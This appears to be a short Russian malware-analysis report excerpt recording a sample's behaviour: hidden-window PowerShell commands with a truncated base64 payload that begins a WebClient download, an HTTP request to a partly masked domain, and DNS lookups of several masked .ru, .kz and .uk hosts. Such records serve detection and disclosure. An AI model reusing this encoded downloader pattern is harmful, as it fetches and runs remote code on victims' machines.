Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABvADcAMQBfADcAOABfADMAPQAoACcAUgAnACsAJwBfAF8AMwBfADAAJwApADsAJABCADkAMgA5AF8AOQA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABsAF8AOAA1AF8AOQBfAD0AKAAnAGgAdAB0AH...
- 'ti####ymills.org.uk':80
- http://www.ti####ymills.org.uk/E0oKOa0DyCN6
- DNS ASK to###yakitut.ru
- DNS ASK ta#####abmaxakula.kz
- DNS ASK ti####ymills.org.uk
- DNS ASK na####torpojizni.ru
- DNS ASK fe##chka.ru
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABvADcAMQBfADcAOABfADMAPQAoACcAUgAnACsAJwBfAF8AMwBfADAAJwApADsAJABCADkAMgA5AF8AOQA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABsAF8AOAA1AF8AOQBfAD0AKAAnAGgAdAB0AH...' (со скрытым окном)